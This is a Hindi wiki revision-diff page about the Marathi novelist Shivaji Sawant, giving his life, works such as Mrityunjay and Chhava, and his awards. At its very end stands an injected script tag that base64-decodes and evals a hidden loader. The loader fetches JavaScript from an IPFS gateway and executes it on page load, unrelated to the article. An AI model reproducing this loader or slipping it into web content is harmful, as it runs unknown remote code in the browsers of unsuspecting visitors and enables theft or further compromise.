"शिवाजी सावंत": अवतरणों में अंतर
गोविन्द राम (वार्ता | योगदान) |
गोविन्द राम (वार्ता | योगदान) No edit summary |
||
पंक्ति 25: | पंक्ति 25: | ||
==संबंधित लेख== | ==संबंधित लेख== | ||
{{मराठी साहित्यकार}} | {{मराठी साहित्यकार}}{{साहित्यकार}} | ||
[[Category:चरित कोश]] | [[Category:चरित कोश]] | ||
[[Category:साहित्यकार]] | [[Category:साहित्यकार]] |
11:53, 24 मार्च 2013 का अवतरण
शिवाजी गोविन्दराव सावंत (जन्म: 31 अगस्त, 1940 - मृत्यु: 18 सितम्बर, 2002) मराठी भाषा के प्रसिद्ध साहित्यकार थे।
जीवन परिचय
शिवाजी सावंत का जन्म 31 अगस्त, 1940 को आजरा, ज़िला कोल्हापुर (महाराष्ट्र) में हुआ था। इन्होंने लेखन की शुरुआत प्रारम्भिक कविता से की, किन्तु परिणति गद्य लेखन में थी। वर्षों के चिन्तन-मनन के उपरान्त 27 वर्ष की अवस्था में ही प्रथम मराठी उपन्यास मृत्युंजय का प्रकाशन हुआ। यह उपन्यास उनकी लोकप्रियता का प्रतिमान बना। इसका अनुवाद अंग्रेज़ी एवं हिन्दी, गुजराती, राजस्थानी, कन्नड़, तेलुगु, मलयालम, बांग्ला आदि अनेक भाषाओं में भी हो चुका है। छावा (मूल मराठी में, 1989) के अतिरिक्त मृत्युंजय और छावा की कथावस्तु को ही लेकर दो नाटकों की रचना। अन्य लोकप्रिय कृतियाँ हैं- लढत (जीवनी), शलाका साज (ललित निबन्ध), अशी मने असे नमुने (रेखा चित्र), मोरवला (रेखा चित्र)। अभी हाल ही में युगपुरुष श्रीकृष्ण के जीवन पर केंद्रित उनका एक बृहत् उपन्यास 'युगन्धर' प्रकाशित हुआ है। उनके उपन्यास मृत्युंजय, छावा, युगन्धर और नाटक संघर्ष के हिन्दी अनुवाद भारतीय ज्ञानपीठ से प्रकाशित हैं। शिवाजी सावंत का 18 सितम्बर, 2002 को मडगाँव (गोवा) में देहावसान हुआ।
प्रमुख कृतियाँ
- मृत्युंजय (उपन्यास)
- छावा (उपन्यास)
- युगन्धर (उपन्यास)
- लढत (जीवनी)
- शलाका साज (ललित निबन्ध)
- अशी मने असे नमुने (रेखा चित्र)
- मोरवला (रेखा चित्र)
सम्मान और पुरस्कार
- गुजरात राज्य सरकार का 'साहित्य अकादमी पुरस्कार' (1982)
- भारतीय ज्ञानपीठ का 'मूर्तिदेवी पुरस्कार' (1995)
- 'आचार्य अत्रे प्रतिष्ठान पुरस्कार', पुणे (1999)
|
|
|
|
|
टीका टिप्पणी और संदर्भ
बाहरी कड़ियाँ
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>